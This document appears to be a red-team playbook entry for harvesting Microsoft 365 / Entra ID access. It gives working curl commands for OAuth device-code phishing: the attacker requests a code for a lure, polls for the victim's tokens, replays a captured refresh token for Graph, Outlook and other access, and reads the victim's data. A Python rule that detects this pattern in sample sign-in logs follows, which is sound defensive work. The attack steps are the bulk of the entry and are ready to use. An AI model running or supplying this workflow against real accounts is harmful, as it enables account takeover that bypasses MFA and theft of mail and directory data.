o365-credential-harvest
Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts.
| field | value |
| --- | --- |
| name | o365-credential-harvest |
| description | Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts. |
| metadata | {"subdomain":"phishing","when_to_use":"o365 phishing, entra id, oauth device code, token replay, tokentactics, microsoft 365 credential harvest, illicit consent","mitre_attack":["T1566.002","T1528","T1550.001","T1621"],"tags":["phishing","o365","oauth","token-replay"]} |
Two Microsoft-identity initial-access paths that avoid a fake password page: the device-code flow and token replay. Both are favored because the victim authenticates on the genuine Microsoft endpoint.
The attacker requests a device code; the victim is social-engineered to enter it at the real microsoft.com/devicelogin. After they complete sign-in (MFA included), the attacker polls and receives access + refresh tokens.
```bash
TENANT=common
CLIENT=d3590ed6-52b3-4102-aeff-aad2292ab01c   # Office client id (example)
# 1. request a device code
curl -s "https://login.microsoftonline.com/$TENANT/oauth2/v2.0/devicecode" \
  -d "client_id=$CLIENT&scope=https://graph.microsoft.com/.default offline_access" | tee dc.json
# -> user_code + verification_uri go into the lure ("enter this code at ...")
# 2. poll for the token after the victim signs in
DC=$(jq -r .device_code dc.json)
curl -s "https://login.microsoftonline.com/$TENANT/oauth2/v2.0/token" \
  -d "grant_type=urn:ietf:params:oauth:grant-type:device_code&client_id=$CLIENT&device_code=$DC"
```
A refresh token captured here (or via an evilginx2 proxy) is exchanged for access tokens against Graph, Outlook, SharePoint, Teams — each a distinct resource scope — without re-auth.
```bash
RT='<captured-refresh-token>'   # placeholder: the refresh token obtained above
curl -s "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
  -d "grant_type=refresh_token&client_id=$CLIENT&refresh_token=$RT&scope=https://graph.microsoft.com/.default"
# use the returned access_token: Authorization: Bearer <token> against graph.microsoft.com
```
A token is interesting; a Graph call returning the victim's mailbox or directory data is the finding:

```bash
# AT = the access_token returned by the refresh-token exchange above
curl -s -H "Authorization: Bearer $AT" https://graph.microsoft.com/v1.0/me
```
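On the blue-team side, the two steps above leave a recognizable trace in Entra ID sign-in logs: an interactive device-code sign-in from the victim's address, followed by non-interactive refresh-token use for the same user and app from a different address. The rule below is an added example, not part of this catalog; it assumes the Microsoft Graph signIns field names (`authenticationProtocol`, `isInteractive`, `incomingTokenType`, `ipAddress`, `status.errorCode`) and runs over constructed sample records.

```python
import json

# Constructed sample Entra ID sign-in events (not real data). Field names follow
# the Graph signIns schema as an assumption of this example; the appId is the
# Office client id quoted in the catalog above.
SAMPLE_SIGNINS = """\
{"userPrincipalName":"alice@example.com","appId":"d3590ed6-52b3-4102-aeff-aad2292ab01c","authenticationProtocol":"oAuth2","isInteractive":true,"ipAddress":"203.0.113.10","createdDateTime":"2024-05-01T08:00:00Z","status":{"errorCode":0}}
{"userPrincipalName":"alice@example.com","appId":"d3590ed6-52b3-4102-aeff-aad2292ab01c","authenticationProtocol":"deviceCode","isInteractive":true,"ipAddress":"203.0.113.10","createdDateTime":"2024-05-01T09:12:00Z","status":{"errorCode":0}}
{"userPrincipalName":"alice@example.com","appId":"d3590ed6-52b3-4102-aeff-aad2292ab01c","authenticationProtocol":"oAuth2","isInteractive":false,"incomingTokenType":"refreshToken","ipAddress":"198.51.100.77","createdDateTime":"2024-05-01T09:14:00Z","status":{"errorCode":0}}
{"userPrincipalName":"bob@example.com","appId":"d3590ed6-52b3-4102-aeff-aad2292ab01c","authenticationProtocol":"deviceCode","isInteractive":true,"ipAddress":"203.0.113.22","createdDateTime":"2024-05-01T10:00:00Z","status":{"errorCode":50126}}
"""


def parse_signins(text):
    """Parse newline-delimited JSON sign-in records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_device_code_abuse(events):
    """Return (rule, user, ip) findings in time order.

    Stage 1: any successful device-code sign-in is flagged (rare in most estates).
    Stage 2: a later non-interactive refresh-token sign-in for the same user+app
    from an IP other than the one that completed stage 1 is the replay pattern.
    """
    findings = []
    device_code_ips = {}  # (user, appId) -> IP that completed the device-code sign-in
    for ev in sorted(events, key=lambda e: e["createdDateTime"]):
        if ev.get("status", {}).get("errorCode", 0) != 0:
            continue  # failed attempts do not yield tokens; out of scope for this rule
        key = (ev["userPrincipalName"], ev["appId"])
        if ev.get("authenticationProtocol") == "deviceCode":
            device_code_ips[key] = ev["ipAddress"]
            findings.append(("device_code_signin", ev["userPrincipalName"], ev["ipAddress"]))
        elif (not ev.get("isInteractive", True)
              and ev.get("incomingTokenType") == "refreshToken"
              and key in device_code_ips
              and ev["ipAddress"] != device_code_ips[key]):
            findings.append(("refresh_from_new_ip", ev["userPrincipalName"], ev["ipAddress"]))
    return findings


if __name__ == "__main__":
    for finding in detect_device_code_abuse(parse_signins(SAMPLE_SIGNINS)):
        print(finding)
```

Bob's failed device-code attempt (errorCode 50126) is dropped; Alice produces both findings, the second being the refresh from 198.51.100.77 that never completed an interactive sign-in.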
Tokens → Credential nodes (type oauth-token, with scope + expiry) linked to the User node. Store ONLY under evidence/phisher/ + the knowledge graph.

Related: the lure-deconfliction handshake; plan/roe.json:data_handling.